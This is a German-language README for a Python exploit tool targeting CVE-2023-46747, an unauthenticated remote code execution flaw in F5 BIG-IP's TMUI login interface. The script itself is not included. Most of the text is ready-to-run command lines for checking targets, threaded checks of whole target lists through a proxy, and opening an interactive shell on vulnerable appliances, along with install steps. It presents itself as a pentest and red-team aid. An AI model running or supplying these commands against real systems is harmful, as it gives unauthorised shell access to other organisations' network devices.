
CVE-2023-46747-RCE PoC
Dies ist ein Python3-Skript, das die nicht authentifizierte Remote-Codeausführungs-Schwachstelle (CVE-2023-46747) in F5 BIG-IP-Appliances über die TMUI-Schnittstelle ausnutzt. Grundsätzlich erhältst du, wenn diese Schwachstelle ausgenutzt wird, eine Shell ohne Anmeldedaten.
Das Skript bietet Threading, Dateieingabe-Unterstützung, Proxy-Handling, optionalen Shell-Zugriff und die Möglichkeit, anfällige Ziele in großen Mengen zu überprüfen. Entwickelt für Sicherheitsforscher, Pentester und Red Teamer, die schnelle und unkomplizierte Automatisierung benötigen.
/tmui/login.jsppython3 bigrce.py -u https://<target> --check
python3 bigrce.py -u https://<target> --shell
python3 bigrce.py -f targets.txt -t 20 --check
python3 bigrce.py -f targets.txt --shell --proxy http://127.0.0.1:8080
-u <url>: Einzelziel-Modus-f <file>: Datei mit Zielen (eine pro Zeile)-t <threads>: Anzahl der Threads (Standard: 5)--check: Nur prüfen, ob das Ziel anfällig ist--shell: Interaktive RCE-Shell starten-p <proxy>: Datenverkehr über Burp/ZAP leitenrequestscolorama (optional, für farbige Ausgabe)Installiere sie bei Bedarf über pip:
pip3 install requests colorama
https://192.168.1.1
192.168.1.2
bigip.company.internal
Es fügt HTTPS automatisch hinzu, falls es fehlt.
Von cediegreyhat – dieses Repository ist von realen Einsätzen bei Assessments inspiriert. Passe es nach Belieben an und erweitere es.
Bleib sicher. Hacke verantwortungsvoll. 🐉
Erstelle gerne Pull Requests, wenn du dieses Tool verbessern möchtest!